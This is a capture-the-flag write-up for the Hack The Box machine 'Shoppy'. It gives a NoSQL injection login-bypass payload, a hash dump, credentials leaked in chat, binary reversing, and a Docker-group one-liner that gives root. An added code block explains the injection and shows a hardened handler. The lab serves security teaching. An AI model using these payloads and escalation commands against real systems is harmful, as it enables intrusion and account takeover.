HTB-Shoppy



I. Approach Overview

  1. Directory enumeration during information gathering finds the /login page;

  2. Log in to /login with a universal password (authentication bypass payload);

  3. Use the universal password again to obtain the josh account (not an SSH account);

  4. Subdomain enumeration finds the mattermost subdomain;

  5. Log in to the mattermost subdomain as josh and read the chat to obtain an SSH account;

  6. Connect over SSH; sudo -l reveals an executable that may be run;

  7. Reverse-engineer the executable to obtain the deploy account;

  8. Docker privilege escalation to root.

II. Information Gathering

nmap (two steps: first scan all ports, then run a targeted service/version scan against only the open ports; this noticeably speeds up the scan)

┌──(root💀kali)-[~/Desktop]
└─# nmap -p- --min-rate 10000 10.129.92.247
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:15 EDT
Nmap scan report for 10.129.92.247
Host is up (0.33s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat

Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds
┌──(root💀kali)-[~/Desktop]
└─# nmap -p 22,80,9093 -sCV 10.129.92.247
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:24 EDT
Nmap scan report for 10.129.92.247
Host is up (0.32s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp   open  http     nginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
9093/tcp open  copycat?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Fri, 31 Mar 2023 08:24:50 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 15
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 15
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 2.8824e-05
|     go_gc_duration_seconds{quantile="0.25"} 7.6212e-05
|     go_gc_d
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Fri, 31 Mar 2023 08:24:51 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 15
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 15
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 2.8824e-05
|     go_gc_duration_seconds{quantile="0.25"} 7.6212e-05
|_    go_gc_d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.77 seconds

Open ports: 22 (ssh), 80 (http), 9093 (copycat); the http-title redirect reveals the domain shoppy.htb

Add the domain to the local hosts file

echo "10.129.92.247 shoppy.htb" >> /etc/hosts

Open shoppy.htb in the browser

Enumerate directories

┌──(root💀kali)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 100 -mc 200,302,301 -u http://shoppy.htb/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shoppy.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200,302,301
________________________________________________

[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 413ms]
    * FUZZ: admin

[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 414ms]
    * FUZZ: images

[Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 417ms]
    * FUZZ: js

[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 435ms]
    * FUZZ: assets

[Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 441ms]
    * FUZZ: css

[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 468ms]
    * FUZZ: login

[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 323ms]
    * FUZZ: Admin

[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 429ms]
    * FUZZ: Login

[Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 335ms]
    * FUZZ: fonts

[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 327ms]
    * FUZZ: ADMIN

[Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 332ms]
    * FUZZ: exports

[Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 376ms]
    * FUZZ: 

[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 330ms]
    * FUZZ: LOGIN

:: Progress: [20116/20116] :: Job [1/1] :: 282 req/sec :: Duration: [0:01:06] :: Errors: 0 ::

Of the enumerated directories, the 301 pages contain nothing and the 302 pages all redirect to /login

III. Universal Password

Visit shoppy.htb/login

Enter the following as the username with any password (universal password); the login succeeds

admin'||'1==1

Click the search tab at the top right of the page and enter the universal password again; a Download export tab appears, as shown below

Click the Download export tab to obtain two accounts, admin and josh

[{
	"_id": "62db0e93d6d6a999a66ee67a",
	"username": "admin",
	"password": "23c6877d9e2b564ef8b32c3a23de27b2"
},
{
	"_id": "62db0e93d6d6a999a66ee67b",
	"username": "josh",
	"password": "6ebcea65320589ca4f2f1ce039975995"
}]
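Why this payload matches every account, and how a login handler stops it, as an added example that is not part of the write-up. The write-up does not show the server code, so the vulnerable shape (a MongoDB `$where` expression built by string concatenation) is an assumption used for illustration; `users`, `buildWhere`, `evalWhere`, `findUsersVulnerable`, `findUsersSafe` and `looksLikeInjection` are illustrative names, and the block runs in Node without a database.

```javascript
// Added example (not the site's code): the $where-concatenation pattern is an
// assumption; the documents below are constructed, not the real export.
const users = [
  { username: "admin", passwordHash: "constructed-hash-1" },
  { username: "josh", passwordHash: "constructed-hash-2" },
];

// Vulnerable pattern: the user-controlled value is spliced into JavaScript
// that the database later evaluates once per document ($where).
function buildWhere(username) {
  return "this.username == '" + username + "'";
}

// Stand-in for the database evaluating a $where clause against one document.
function evalWhere(expr, doc) {
  return Boolean(new Function("return (" + expr + ");").call(doc));
}

// With admin'||'1==1 the clause becomes  this.username == 'admin'||'1==1'
// and the non-empty string '1==1' is truthy, so every document matches.
function findUsersVulnerable(username) {
  const expr = buildWhere(username);
  return users.filter((doc) => evalWhere(expr, doc)).map((d) => d.username);
}

// Hardened version: reject anything that is not a plain string and use an
// equality filter, so the value is data and never code. A real handler would
// then verify the password with a slow hash such as bcrypt.
function findUsersSafe(username) {
  if (typeof username !== "string") return [];
  return users.filter((doc) => doc.username === username).map((d) => d.username);
}

// Heuristic for login logs or WAF rules: account names never need quote or
// operator characters, so their presence is worth alerting on.
function looksLikeInjection(username) {
  return typeof username !== "string" || /['"|&]/.test(username);
}

module.exports = { findUsersVulnerable, findUsersSafe, looksLikeInjection };
```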

Crack the hash at https://crackstation.net/

josh
remembermethisway

Logging in over SSH with this account fails

So enumerate subdomains with wfuzz; many 301 responses appear

┌──(root💀kali)-[~/Desktop]
└─# wfuzz -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt             
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://10.129.92.247/
Total requests: 4989
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                   
=====================================================================
000000001:   301        7 L      11 W       169 Ch      "www"
000000020:   301        7 L      11 W       169 Ch      "www2"
000000019:   301        7 L      11 W       169 Ch      "dev"
000000015:   301        7 L      11 W       169 Ch      "ns"
000000003:   301        7 L      11 W       169 Ch      "ftp"
000000021:   301        7 L      11 W       169 Ch      "ns3"
000000022:   301        7 L      11 W       169 Ch      "pop3"
000000018:   301        7 L      11 W       169 Ch      "blog"
......

Then enumerate subdomains again with ffuf for speed (wfuzz is painfully slow here; use ffuf or gobuster instead), with a larger wordlist and filtering out 301 responses

┌──(root💀kali)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -fc 301 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.92.247
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.shoppy.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________

[Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 318ms]
    * FUZZ: mattermost

:: Progress: [100000/100000] :: Job [1/1] :: 100 req/sec :: Duration: [0:13:49] :: Errors: 0 ::

The mattermost subdomain is found; add it to the local hosts file

echo "10.129.92.247 mattermost.shoppy.htb" >> /etc/hosts

Visit mattermost.shoppy.htb

Log in with the josh account from before. In the Deploy Machine channel on the left, the chat history reveals the jaeger account

username: jaeger
password: Sh0ppyBest@pp!

Connect over ssh (the IP changed because the target machine was restarted)

┌──(root💀kali)-[~/Desktop]
└─# ssh jaeger@10.129.93.16
jaeger@10.129.93.16's password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
jaeger@shoppy:~$ pwd
/home/jaeger

Run sudo -l to check this user's privileges

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

The executable /home/deploy/password-manager can be run as deploy; download it to the local machine with the following steps

Start an HTTP server in the ssh session

jaeger@shoppy:/home/deploy$ python3 -m http.server 9898
Serving HTTP on 0.0.0.0 port 9898 (http://0.0.0.0:9898/) ...

Then download it locally with the following command

wget http://10.129.93.16:9898/password-manager

Inspect the file locally with the file command

┌──(root💀kali)-[~/Desktop]
└─# file password-manager
password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped

It is a 64-bit ELF (Executable and Linkable Format) executable, dynamically linked and not stripped

IV. Reverse Analysis

Static analysis with radare2

Reference: https://blog.csdn.net/qq_28429161/article/details/107810534

r2 password-manager

Enter the following commands to locate the main function

> aaa	# auto-analyse the binary and name functions
> afl	# list the functions in the program

Find main, then seek to its address and view its disassembly

> s main	# seek to the entry of main
> pdf	# disassemble the current function

As the screenshot above shows, int main() and the scope operator :: indicate a C++ program; when run it first prints Welcome to Josh password manager!

It then prints Please enter your master password: and reads keyboard input, as shown below

The keyboard input is then compared character by character against Sample

If they match, it prints Access granted! Here is creds ! and calls system() to run cat, displaying the contents of /home/deploy/creds.txt

Back in the target's ssh session, run the following command and enter Sample at the Please enter your master password: prompt

jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
[sudo] password for jaeger: 
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

The username and password of the deploy account are now known; run su deploy to switch to the deploy account

The deploy user belongs to the docker group; search for docker on the following site

https://gtfobins.github.io/

V. Docker Privilege Escalation

The site shows the following privilege escalation command

For a more stable shell, replace the trailing sh with bash and run

deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt bash

Root obtained

Over!

References

https://blog.csdn.net/qq_45894840/article/details/127527914

https://0xdf.gitlab.io/2023/01/14/htb-shoppy.html


Author: wa0er
Copyright: Unless otherwise stated, all posts on this blog are licensed under CC BY-NC 4.0. Please credit wa0er when reposting!